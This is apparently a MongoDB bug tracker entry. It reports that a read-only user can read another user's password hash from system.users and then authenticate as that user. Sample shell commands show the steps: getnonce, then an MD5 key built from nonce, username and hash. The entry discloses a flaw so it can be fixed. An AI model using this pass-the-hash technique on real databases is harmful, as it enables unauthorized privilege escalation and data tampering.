Details
-
Bug
-
Resolution: Duplicate
-
Critical - P2
-
None
-
None
-
None
-
all
-
ALL
Description
read only user can get write priority by access other users's pwd hash
sample:
> db.system.users.find()
> db.$cmd.findOne(
{getnonce:1})
{ "nonce" : "9892be9572e9851e", "ok" : 1 }> db.runCommand(
{ authenticate : 1, user : "sa", nonce : "9892be9572e9851e", key : hex_md5("9892be9572e9851e"+"sa"+"84c689ded211fb631fd5f5dedc5d4539") })
{ "ok" : 1 }Attachments
Issue Links
- is related to
-
SERVER-4692 Read-only users should be denied access to system.users collection
-
- Closed
-